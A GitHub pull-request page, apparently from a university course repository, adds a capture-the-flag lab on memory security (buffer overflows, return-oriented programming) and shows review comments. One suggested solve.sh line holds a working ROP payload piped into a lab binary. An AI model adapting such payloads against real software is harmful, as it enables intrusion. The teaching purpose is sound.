-
Notifications
You must be signed in to change notification settings - Fork 12
New issue
Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? # to your account
chapters/memory-security/ctf: Add CTF lab #25
base: main
Are you sure you want to change the base?
Conversation
4d8df52
to
ae57d78
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Things are looking well for the most part. Below are some things that are missing, besides my inline comments.
- Some exercises are missing their source code, such as
feeling-chained
. You can find them here [1]. Add them to thesolution/
folders so we don't lose them and have them all in one place. - Add the makefiles to all exercises because some of them define necessary compiler flags such as
-fno-stack-protector
- Provide the paths to all files that students must use. For example write
task-name/support/binary
instead of justbinary
. - Modify all flags to start with
HSI_
instead ofiocla_
and then useobfuscate.c
[2] to embed it in the source code. I'm not sure whether to add the contents of [2] to every task'ssolution/
folder or not. Let's not do this for now since this tool is also used for CTFs which need to be private because they are contests. We can always add it later if needed.
[1] https://github.com/systems-cs-pub-ro/iocla-internal/tree/master/laboratoare/content/ctf/sol
[2] https://github.com/systems-cs-pub-ro/iocla-internal/tree/master/comunitate/ctf/obfuscator
chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/main.c
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/indirect-business/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/look-at-him-go/solution/README.md
Show resolved
Hide resolved
35c21ec
to
c2e5f6b
Compare
Don't forget to add the sources for the binaries so we have them all in one place. |
868fcb1
to
9780701
Compare
b5482b1
to
d067509
Compare
81e87f2
to
9b0cd80
Compare
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Things are looking considerably better now and the solutions are clear and straightforward. GG! My inline comments now focus on smaller details, but most of them apply to all tasks.
chapters/memory-security/ctf/drills/tasks/feeling-chained/support/Makefile
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/obfuscator.c
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/support/buff-ovf3
Outdated
Show resolved
Hide resolved
@@ -0,0 +1,30 @@ | |||
# Solution | |||
|
|||
In a nature similar to that of the previous exercise, we take a close look at the `objdump` disassembly output of the binary using the `objdump -D -M intel link2` command, specifically focusing on the `helper()` function: |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Replace "previous exercise" with [hidden-in-plain-sight-1](link/to/hidden-in-plain-sight-1)
.
chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Add an image to showcase the stack after sending the payload: which values point to gadgets and which numbers are popped into register. Use https://app.diagrams.net/ to create and save it in .SVG
format.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
On second thought, this might not be needed.
In this laboratory, you will have to apply most of the concepts presented throughout this course under the format of `Capture-The-Flag` tasks. | ||
These tasks will test your understanding and mastery of specific static and dynamic analysis methods and tools, the compilation process, assembly language - syntax, registers, memory handling, functions, - as well as your ability to identify and exploit simple buffer overflow vulnerabilities. | ||
|
||
## Return Oriented Programming |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Bump on this though. This would be of great use. You already have the image above, just add some text to walk students through it.
This commit adds the adapted material, including references and sentence rephrasing for enhanced readability, as well as solution writeups. Signed-off-by: Dimitrie Valu <valu.d54@gmail.com>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I only made suggestions that should be applied to all solve.sh
s. Don't worry about the line length. Don't worry about the line length.
@@ -0,0 +1,3 @@ | |||
#!/bin/bash | |||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
# SPDX-License-Identifier: BSD-3-Clause | |
@@ -0,0 +1,3 @@ | |||
#!/bin/bash | |||
|
|||
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3 |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3 | |
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ../support/buff-ovf3 |
Use the relative path to the binary so the script can be run directly from here.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
On second thought, this might not be needed.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Make this file executable
In this laboratory, you will have to apply most of the concepts presented throughout this course under the format of `Capture-The-Flag` tasks. | ||
These tasks will test your understanding and mastery of specific static and dynamic analysis methods and tools, the compilation process, assembly language - syntax, registers, memory handling, functions, - as well as your ability to identify and exploit simple buffer overflow vulnerabilities. | ||
|
||
## Return Oriented Programming |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Bump on this though. This would be of great use. You already have the image above, just add some text to walk students through it.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Looks great! 👍
Address the changes made by Teo Dutu and everything should be fine.
Prerequisite Checklist
Description of changes
This commit adds the adapted material, including references and sentence rephrasing for enhanced readability, as well as solution writeups.